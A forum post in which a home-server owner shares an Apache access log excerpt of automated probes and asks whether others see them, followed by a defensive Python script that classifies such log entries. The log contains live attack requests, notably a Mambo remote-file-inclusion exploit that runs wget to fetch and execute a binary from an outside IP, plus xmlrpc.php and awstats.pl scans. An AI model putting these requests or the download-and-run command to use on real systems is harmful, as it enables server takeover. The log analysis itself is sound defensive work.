

Who else has "hacker attacks" on their Apache?
Hello everyone,

the headline is probably a bit exaggerated, but I'm hoping for lively feedback ;-)





Below you will find an excerpt from the Apache access log of my private web server at home; it really only serves as a file store, so not much runs on it.

I am well aware that on the Internet you are exposed to all kinds of scanners, trojans and worms every single day. The odd thing about the log excerpt is that specific files are deliberately requested, or at least the attempt is made. Judging by the names, it is presumably possible to execute system code with them. The files are not always requested from the same IP but from different ones.

So it seems to me that the logic of a conventional port scanner has been refined by also checking whether code can be called! At this depth that is rather new to me...

I don't want to cause panic; after all, the requests were all answered with 404 or 405, but I do find it worrying.....



Of course I immediately checked the access log on my provider's Apache, since an affected application runs there, but there is nothing there...

Has any of you made the same observations?





x.x.x.x - - [11/Feb/2006:00:39:01 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1" 404 391

x.x.x.x - - [11/Feb/2006:00:39:02 +0100] "GET /cache/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1" 404 391

x.x.x.x - - [11/Feb/2006:00:39:03 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1" 404 385

x.x.x.x - - [11/Feb/2006:00:39:04 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| HTTP/1.1" 404 384

x.x.x.x - - [16/Feb/2006:16:04:27 +0100] "POST /xmlrpc.php HTTP/1.1" 404 386

x.x.x.x - - [16/Feb/2006:16:04:29 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 391

x.x.x.x - - [16/Feb/2006:16:04:30 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 398

x.x.x.x - - [16/Feb/2006:16:04:31 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 399

x.x.x.x - - [16/Feb/2006:16:04:32 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 393

x.x.x.x - - [16/Feb/2006:16:04:33 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 399

x.x.x.x - - [16/Feb/2006:16:04:35 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 396

x.x.x.x - - [16/Feb/2006:16:04:36 +0100] "POST /xmlrpc.php HTTP/1.1" 404 386

x.x.x.x - - [16/Feb/2006:16:04:37 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 393

x.x.x.x - - [16/Feb/2006:16:04:38 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 393

x.x.x.x - - [17/Feb/2006:04:23:46 +0100] "GET // adm/awstats/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:47 +0100] "GET // awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:47 +0100] "GET // cgi-local/ awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:49 +0100] "GET // cgi-local/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:50 +0100] "GET // estadisticas/ awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:51 +0100] "GET // estadisticas/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:54 +0100] "GET // estadisticas/cgi-bin/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:54 +0100] "GET // usage/ awstats. pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:56 +0100] "GET // usage/awstats. pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:57 +0100] "GET // webstats/ awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:58 +0100] "GET // webstats/awstats.pl HTTP/1.1" 200 164

x.x.x.x - - [17/Feb/2006:04:23:58 +0100] "GET //.../awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:24:02 +0100] "GET //adm/ awstats/ awstats.pl HTTP/1.1" 404 379

x.x.x.x - - [17/Feb/2006:04:24:03 +0100] "GET //adm/ awstats/awstats.pl HTTP/1.1" 404 379

x.x.x.x - - [17/Feb/2006:04:24:04 +0100] "GET //adm/awstats/awstats.pl HTTP/1.1" 404 397

x.x.x.x - - [17/Feb/2006:04:24:05 +0100] "GET //admin/ awstats.pl HTTP/1.1" 404 381

x.x.x.x - - [17/Feb/2006:04:24:06 +0100] "GET //admin/awstats.pl HTTP/1.1" 404 391

x.x.x.x - - [17/Feb/2006:04:24:07 +0100] "GET //aws/awstats. pl HTTP/1.1" 404 387

x.x.x.x - - [17/Feb/2006:04:24:08 +0100] "GET //aws/awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:24:13 +0100] "GET //awstats-cgibin/awstats.pl HTTP/1.1" 404 400

x.x.x.x - - [17/Feb/2006:04:24:14 +0100] "GET //awstats.pl HTTP/1.1" 404 385

x.x.x.x - - [17/Feb/2006:04:24:14 +0100] "GET //awstats/ awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:24:19 +0100] "GET //awstats/awstats.pl HTTP/1.1" 404 393

x.x.x.x - - [17/Feb/2006:04:24:30 +0100] "GET //bin/awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:24:31 +0100] "GET //bin/awstats/ awstats.PL HTTP/1.1" 404 387

x.x.x.x - - [17/Feb/2006:04:24:33 +0100] "GET //bin/awstats/ awstats.pl HTTP/1.1" 404 387

x.x.x.x - - [17/Feb/2006:04:24:37 +0100] "GET //bin/awstats/awstats.PL HTTP/1.1" 404 397

x.x.x.x - - [17/Feb/2006:04:24:39 +0100] "GET //bin/awstats/awstats.pl HTTP/1.1" 404 397

x.x.x.x - - [17/Feb/2006:04:25:11 +0100] "GET //cgi-bin/stats/awstats.pl HTTP/1.1" 404 399

x.x.x.x - - [17/Feb/2006:04:25:12 +0100] "GET //cgi-bin2/ awstats/ awstats.pl HTTP/1.1" 404 384

x.x.x.x - - [17/Feb/2006:04:25:13 +0100] "GET //cgi-bin2/ awstats/awstats.pl HTTP/1.1" 404 384

x.x.x.x - - [17/Feb/2006:04:25:14 +0100] "GET //cgi-bin2/awstats/ awstats.pl HTTP/1.1" 404 392

x.x.x.x - - [17/Feb/2006:04:25:15 +0100] "GET //cgi-bin2/awstats/awstats.pl HTTP/1.1" 404 402

x.x.x.x - - [17/Feb/2006:04:25:16 +0100] "GET //cgi-local/ awstats.pl HTTP/1.1" 404 385

x.x.x.x - - [17/Feb/2006:04:25:17 +0100] "GET //cgi-local/awstats.pl HTTP/1.1" 404 395

x.x.x.x - - [17/Feb/2006:04:25:17 +0100] "GET //cgi/awstats.pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:25:18 +0100] "GET //cgi/stats/ awstats.pl HTTP/1.1" 404 385

x.x.x.x - - [17/Feb/2006:04:25:20 +0100] "GET //cgi/stats/awstats.pl HTTP/1.1" 404 395

x.x.x.x - - [17/Feb/2006:04:25:21 +0100] "GET //chi-bin/ awstats/ awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:25:22 +0100] "GET //chi-bin/ awstats/awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:25:22 +0100] "GET //chi-bin/awstats/ awstats.pl HTTP/1.1" 404 391

x.x.x.x - - [17/Feb/2006:04:25:23 +0100] "GET //chi-bin/awstats/awstats.pl HTTP/1.1" 404 401

x.x.x.x - - [17/Feb/2006:04:25:24 +0100] "GET //estadisticas/ awstats.pl HTTP/1.1" 404 388

x.x.x.x - - [17/Feb/2006:04:25:25 +0100] "GET //estadisticas/awstats.pl HTTP/1.1" 404 398

x.x.x.x - - [17/Feb/2006:04:25:25 +0100] "GET //estadisticas/cgi-bin/awstats.pl HTTP/1.1" 404 406

x.x.x.x - - [17/Feb/2006:04:25:26 +0100] "GET //s-cgi/awstats. pl HTTP/1.1" 404 389

x.x.x.x - - [17/Feb/2006:04:25:27 +0100] "GET //s-cgi/awstats.pl HTTP/1.1" 404 391

x.x.x.x - - [17/Feb/2006:04:25:29 +0100] "GET //scripts/ awstats.pl HTTP/1.1" 404 383

x.x.x.x - - [17/Feb/2006:04:25:29 +0100] "GET //scripts/awstats.pl HTTP/1.1" 404 393





Regards, Michael

Have you met the egg-laying, wool-bearing, milk-giving sow yet?

Taking initiative is the first step toward independence - better a tip in the right direction than a complete solution!
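
A triage sketch for an excerpt like the one posted above, added here as an example and not part of the original post: it groups access-log entries into the three probe families visible in the log (remote-include parameter, xmlrpc.php, awstats.pl) and lists every probe the server did not answer with a 4xx status. The rule names, the sample lines, the 192.0.2.x hosts and the example.invalid URL are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status size
LINE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/\d\.\d" '
                     r'(?P<status>\d{3}) (?:\d+|-)')

# Probe families visible in the posted excerpt (rule names are this example's own).
RULES = [
    ("remote-include", re.compile(r'[?&][\w\[\]]+=(?:https?|ftp)://', re.I)),
    ("xmlrpc-probe", re.compile(r'/xmlrpc\.php(?:\?|$)', re.I)),
    ("awstats-probe", re.compile(r'awstats\.\s*pl(?:\?|$)', re.I)),
]

def classify(line):
    """Return a dict describing the probe, or None for unparsed/ordinary requests."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    target = unquote(m["target"])  # decode %xx so encoded variants match too
    for family, rx in RULES:
        if rx.search(target):
            return {"family": family, "host": m["host"], "time": m["time"],
                    "target": target, "status": int(m["status"])}
    return None

def triage(lines):
    """Count probes per family and status; collect probes not answered with 4xx."""
    counts, review = Counter(), []
    for hit in filter(None, map(classify, lines)):
        counts[(hit["family"], hit["status"])] += 1
        if not 400 <= hit["status"] < 500:
            review.append(hit)  # the server did not reject this one: check by hand
    return counts, review

# Constructed sample lines modelled on the excerpt; hosts and URL are placeholders.
SAMPLE = [
    '192.0.2.10 - - [11/Feb/2006:00:39:01 +0100] "GET /mambo/index2.php?GLOBALS='
    '&mosConfig_absolute_path=http://example.invalid/cmd.gif? HTTP/1.1" 404 391',
    '192.0.2.11 - - [16/Feb/2006:16:04:29 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 391',
    '192.0.2.12 - - [17/Feb/2006:04:23:47 +0100] "GET // awstats.pl HTTP/1.1" 200 164',
    '192.0.2.12 - - [17/Feb/2006:04:24:14 +0100] "GET //awstats.pl HTTP/1.1" 404 385',
    '192.0.2.13 - - [17/Feb/2006:05:10:02 +0100] "GET /files/report.pdf HTTP/1.1" 200 52311',
]

if __name__ == "__main__":
    counts, review = triage(SAMPLE)
    for (family, status), n in sorted(counts.items()):
        print(f"{family:15} {status} x{n}")
    for hit in review:
        print("REVIEW:", hit["host"], hit["time"], repr(hit["target"]), hit["status"])
```

A probe that shows up in the review list is not proof of a hit; compare its response size with what the server normally returns for that path before drawing conclusions.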


